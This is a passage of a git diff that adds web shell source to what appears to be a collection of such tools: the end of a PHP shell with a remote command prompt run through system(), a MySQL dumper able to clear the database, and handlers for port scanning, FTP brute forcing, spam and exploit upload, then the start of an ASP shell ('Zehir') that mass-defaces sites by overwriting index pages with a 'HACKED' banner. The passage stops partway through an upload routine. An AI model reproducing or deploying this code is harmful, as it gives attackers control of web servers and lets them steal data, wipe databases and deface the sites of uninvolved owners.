+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
\ No newline at end of file
diff --git a/138shell/Z/Zehir 4.asp.txt b/138shell/Z/Zehir 4.asp.txt
new file mode 100644
index 0000000..1be2420
--- /dev/null
+++ b/138shell/Z/Zehir 4.asp.txt	
@@ -0,0 +1,1190 @@
+<%
+mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
+dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
+on error resume next
+Dim objFSO,popup
+Set objFSO = CreateObject ("Scripting.FileSystemObject")
+if Request("kuskapani")=1 then
+    Response.End
+end if
+
+
+if Request("kuskapani")=2 then
+    on error resume next
+    path = Request("path")
+    sFolder = Request("SubFolder")
+    fName = Request("FileName")
+    d1 = Request("dosya1")
+    d2 = Request("dosya2")
+    d3 = Request("dosya3")
+    d4 = Request("dosya4")
+    bg__ = Request.Form("selectColour")
+    if bg__ = "0" then bg__ = "#ffffff"
+    byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>HACKED " & Session("n2") & "3 ;)</font>"
+
+    sFolder = Replace(sFolder,"/","\")
+
+    if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    h__ = 0
+    f__ = 0
+    ss__ = now
+    For Each f1 In fc
+        hedef_ = replace(f1.path,"/","\")
+        if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
+        hedef__ = left(hedef_,len(hedef_)-1)
+        folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
+            if d1<>"" then d1 = true
+            if d2<>"" then d2 = true
+            if d3<>"" then d3 = true
+            if d4<>"" then d4 = true
+            on error goto 0:on error resume next
+            if fName<>"" then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
+                MyFile.write byMesaj
+            end if
+            if d1 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d2 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d3 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
+                MyFile.write byMesaj
+            end if
+            if d4 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
+                MyFile.write byMesaj
+            end if
+
+            if err<>0 then
+                response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
+                f__ = f__ + 1
+            else
+                response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
+                h__ = h__ + 1
+            end if
+    Next
+    ss___ = now
+    response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
+    response.End
+end if
+
+status = Request("status")
+path   = Request("path")
+dPath  = Request("dPath")
+arama  = Request("txArama")
+dkayit = Request("dkayit")
+table  = Request("table")
+del    = Request("del")
+islem  = Request("islem")
+strSQL = Request("strSQL")
+cf       = Request("cf")
+pathfile = request("pathfile")
+if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
+if status="" then status=2
+popup = true
+'////////////////////////////////
+Function ReadBinaryFile(FileName)
+  Const adTypeBinary = 1
+  Dim BinaryStream
+  Set BinaryStream = CreateObject("ADODB.Stream")
+  BinaryStream.Type = adTypeBinary
+  BinaryStream.Open
+  BinaryStream.LoadFromFile FileName
+  ReadBinaryFile = BinaryStream.Read
+End Function
+if status="-3" then
+    Response.Buffer=True
+    Set Fil = objFSO.GetFile(pathfile)
+
+    Response.contenttype="application/force-download"
+    Response.AddHeader "Cache-control","private"
+    Response.AddHeader "Content-Length", Fil.Size
+    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
+
+    Response.BinaryWrite readBinaryFile(Fil.path)
+    Set f = Nothing: Set Fil = Nothing
+    response.End()
+end if
+'//////////////////////////////////
+if status="-4" then popup=false
+if status="13" then popup=false
+if status="14" then popup=false
+if status="15" then popup=false
+if status="16" then popup=false
+if status="17" then popup=false
+if status="18" then popup=false
+if status="19" then popup=false
+if status="33" then popup=false
+if status="40" then popup=false
+if status="50" then popup=false
+byMsg = request.QueryString("byMsg")
+if byMsg<>"" then response.Write byMsg
+response.Write "<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&gt;</title>"
+if popup then
+%>
+<center>
+<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
+<script language=javascript>
+    function sistemBilgisi(yol){
+        NewWindow(yol,"",600,240,"no");
+    }
+    function SitelerTestte(yol){
+        NewWindow(yol,"",530,420,"no");
+    }
+    function klasorIslemleri(yol){
+        NewWindow(yol,"",400,280,"no");
+    }
+    function sqlServer(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function poweredby(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function sistemTest(yol){
+        NewWindow(yol,"",400,300,"no");
+    }
+</script>
+<%
+end if
+'####################################
+Class clsUpload
+    Private mbinData
+    Private mlngChunkIndex
+    Private mlngBytesReceived
+    Private mstrDelimiter
+    Private CR
+    Private LF
+    Private CRLF
+    Private mobjFieldAry()
+    Private mlngCount
+
+    Private Sub RequestData
+        Dim llngLength
+        mlngBytesReceived = Request.TotalBytes
+        mbinData = Request.BinaryRead(mlngBytesReceived)
+    End Sub
+
+    Private Sub ParseDelimiter()
+        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+    End Sub
+
+    Private Sub ParseData()
+        Dim llngStart
+        Dim llngLength
+        Dim llngEnd
+        Dim lbinChunk
+        llngStart = 1
+        llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+        While Not llngStart = 0
+            llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+            llngLength = llngEnd - llngStart
+            lbinChunk = MidB(mbinData, llngStart, llngLength)
+            Call ParseChunk(lbinChunk)
+            llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+        Wend
+    End Sub
+
+    Private Sub ParseChunk(ByRef pbinChunk)
+        Dim lstrName
+        Dim lstrFileName
+        Dim lstrContentType
+        Dim lbinData
+        Dim lstrDisposition
+        Dim lstrValue
+        lstrDisposition = ParseDisposition(pbinChunk)
+        lstrName = ParseName(lstrDisposition)
+        lstrFileName = ParseFileName(lstrDisposition)
+        lstrContentType = ParseContentType(pbinChunk)
+        If lstrContentType = "" Then
+            lstrValue = CStrU(ParseBinaryData(pbinChunk))
+        Else
+            lbinData = ParseBinaryData(pbinChunk)
+        End If
+        Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+    End Sub
+
+    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+        Dim lobjField
+        ReDim Preserve mobjFieldAry(mlngCount)
+        Set lobjField = New clsField
+        lobjField.Name = pstrName
+        lobjField.FilePath = pstrFileName
+        lobjField.ContentType = pstrContentType
+        If LenB(pbinData) = 0 Then
+            lobjField.BinaryData = ChrB(0)
+            lobjField.Value = pstrValue
+            lobjField.Length = Len(pstrValue)
+        Else
+            lobjField.BinaryData = pbinData
+            lobjField.Length = LenB(pbinData)
+            lobjField.Value = ""
+        End If
+        Set mobjFieldAry(mlngCount) = lobjField
+        mlngCount = mlngCount + 1
+    End Sub
+
+    Private Function ParseBinaryData(ByRef pbinChunk)
+        Dim llngStart
+        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+        If llngStart = 0 Then Exit Function
+        llngStart = llngStart + 4
+        ParseBinaryData = MidB(pbinChunk, llngStart)
+    End Function
+
+    Private Function ParseContentType(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 15
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+    End Function
+
+    Private Function ParseDisposition(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 22
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+    End Function
+
+    Private Function ParseName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 6
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+' ------------------------------------------------------------------------------
+    Private Function ParseFileName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 10
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+
+    Public Property Get Count()
+        Count = mlngCount
+    End Property
+
+    Public Default Property Get Fields(ByVal pstrName)
+        Dim llngIndex
+        If IsNumeric(pstrName) Then
+            llngIndex = CLng(pstrName)
+            If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+                Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+                Exit Property
+            End If
+            Set Fields = mobjFieldAry(pstrName)
+        Else
+            pstrName = LCase(pstrname)
+            For llngIndex = 0 To mlngCount - 1
+                If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+                    Set Fields = mobjFieldAry(llngIndex)
+                    Exit Property
+                End If
+            Next
+        End If
+        Set Fields = New clsField
+    End Property
+
+    Private Sub Class_Terminate()
+        Dim llngIndex
+        For llngIndex = 0 To mlngCount - 1
+            Set mobjFieldAry(llngIndex) = Nothing
+
+        Next
+        ReDim mobjFieldAry(-1)
+    End Sub
+
+    Private Sub Class_Initialize()
+        ReDim mobjFieldAry(-1)
+        CR = ChrB(Asc(vbCr))
+        LF = ChrB(Asc(vbLf))
+        CRLF = CR & LF
+        mlngCount = 0
+        Call RequestData
+        Call ParseDelimiter()
+        Call ParseData
+    End Sub
+
+    Private Function CStrU(ByRef pstrANSI)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = LenB(pstrANSI)
+        For llngIndex = 1 To llngLength
+            CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+        Next
+    End Function
+
+    Private Function CStrB(ByRef pstrUnicode)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = Len(pstrUnicode)
+        For llngIndex = 1 To llngLength
+            CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+        Next
+    End Function
+End Class
+'####################################
+Session("n1") = "by Ejder"
+Class clsField
+    Public Name
+    Private mstrPath
+    Public FileDir
+    Public FileExt
+    Public FileName
+    Public ContentType
+    Public Value
+    Public BinaryData
+    Public Length
+    Private mstrText
+
+    Public Property Get BLOB()
+        BLOB = BinaryData
+    End Property
+
+    Public Function BinaryAsText()
+        Dim lbinBytes
+        Dim lobjRs
+        If Length = 0 Then Exit Function
+        If LenB(BinaryData) = 0 Then Exit Function
+
+        If Not Len(mstrText) = 0 Then
+            BinaryAsText = mstrText
+            Exit Function
+        End If
+        lbinBytes = ASCII2Bytes(BinaryData)
+           mstrText = Bytes2Unicode(lbinBytes)
+        BinaryAsText = mstrText
+    End Function
+
+    Public Sub SaveAs(ByRef pstrFileName)
+        Const adTypeBinary=1
+        Const adSaveCreateOverWrite=2
+        Dim lobjStream
+        Dim lobjRs
+        Dim lbinBytes
+        If Length = 0 Then Exit Sub
+        If LenB(BinaryData) = 0 Then Exit Sub
+        Set lobjStream = Server.CreateObject("ADODB.Stream")
+        lobjStream.Type = adTypeBinary
+        Call lobjStream.Open()
+        lbinBytes = ASCII2Bytes(BinaryData)
+        Call lobjStream.Write(lbinBytes)
+
+        On Error Resume Next
+
+        Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+
+        'if err<>0 then response.Write "<br>"&err.Description
+
+        Call lobjStream.Close()
+        Set lobjStream = Nothing
+    End Sub
+
+    Public Property Let FilePath(ByRef pstrPath)
+        mstrPath = pstrPath
+        If Not InStrRev(pstrPath, ".") = 0 Then
+            FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+            FileExt = UCase(FileExt)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+        End If
+    End Property
+
+    Public Property Get FilePath()
+        FilePath = mstrPath
+    End Property
+
+    private Function ASCII2Bytes(ByRef pbinBinaryData)
+        Const adLongVarBinary=205
+        Dim lobjRs
+        Dim llngLength
+        Dim lbinBuffer
+        llngLength = LenB(pbinBinaryData)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+        Call lobjRs.Update()
+        lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        ASCII2Bytes = lbinBuffer
+    End Function
+
+    Private Function Bytes2Unicode(ByRef pbinBytes)
+        Dim lobjRs
+        Dim llngLength
+        Dim lstrBuffer
+        llngLength = LenB(pbinBytes)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+        Call lobjRs.Update()
+        lstrBuffer = lobjRs.Fields("BinaryData").Value
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        Bytes2Unicode = lstrBuffer
+    End Function
+End Class
+Session("n2") = "EJDER"
+'####################################
+function addslash(path)
+    if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+sub Upload()
+    dim objUpload,f,max,i,name,path,size,success
+
+    set objUpload=New clsUpload
+
